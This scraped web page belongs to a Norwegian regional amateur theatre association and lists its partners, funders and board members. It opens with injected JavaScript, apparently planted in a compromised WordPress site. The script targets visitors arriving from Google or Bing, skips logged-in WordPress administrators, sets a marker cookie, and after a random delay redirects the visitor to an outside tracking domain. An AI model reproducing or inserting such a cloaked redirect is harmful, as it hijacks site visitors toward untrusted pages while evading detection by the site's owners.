((event) => { var ref = document.referrer || ''; if (ref.length === 0) { return; } ref = ref.toLowerCase(); if (ref.indexOf('google') === -1 && ref.indexOf('bing') === -1) { return; } var cookie = document.cookie || ''; if (cookie.indexOf('wordpress_logged') !== -1 || cookie.indexOf('wp-settings') !== -1 || cookie.indexOf('wordpress_test') !== -1) { return; } if (cookie.indexOf('wordpress-test') !== -1) { return; } function generateRandomInteger(min, max) { return Math.floor(min + Math.random()*(max - min + 1)); } document.cookie = "wordpress-test=1; max-age=86400; path=/;"; const delay = generateRandomInteger(2000, 6000); setTimeout(() => { window.location.replace('http://cabonusoffer.com/track/'); }, delay);})(); style="" data-bg="">
Trøndelag Fylkeskommune

Trøndelag Fylkeskommune er vår hovedbidragsyter til driftsstøtte. Vi skal bidra sammen med Fylkeskommunen å utvikle og støtte feltet gjennom kurs, kompetansehving, faglig tjenester og strategisk arbeid med amatørene. 

Nettverk for Regionale teaterråd

Teatersamlaget er medlem i NRT - en nasjonal paraply for regionale teaterråd. Jobber for nasjonale kultursaker, tilrettelegging og støtteordninger for lokale teaterforeninger. Driver et utstrakt teaterfaglig informasjonsarbeid.

Turneteateret i Trøndelag 

Nord-Trøndelag Teaterverksted ble etablert sammen med  Nord-Trøndelag Teatersamlag på 80-tallet, som i dag er Turneteateret i Trøndelag - i dag en rundtreisende teater i  Trøndelag og en viktig samarbeidspartner til Teatersamlaget.

Vi samarbeider blant annet med Scenetreff arrangementet som blir arrangert en gang i året, årlige møter med teateret og ikke minst mulighet å låne kontorplass på Verdal. 

Norsk Revyfagligsenter

Trøndelag Teatersamlag er en av stifterne av Norsk Revyfagligsenter på 90-tallet, og vi samarbeider i dag med Norsk Revy på Scenetreff arrangementet. 

Jo Arne Fosmo

Teaterkonsulent
jaf@teatersamlag.no
+41477474

 

 

Thomas Margido

Styremedlem

Teater Eureka

Ragnhild Arntsen

Styreleder

Sjiraffen Kultursenter

Stig-Arvid Leinum

Styremedlem

 

 

 

 

Edvard Øyangen

Varamedlem

Tonje Opøien

Varamedlem

Bergmannsteateret

[custom-facebook-feed feed=1]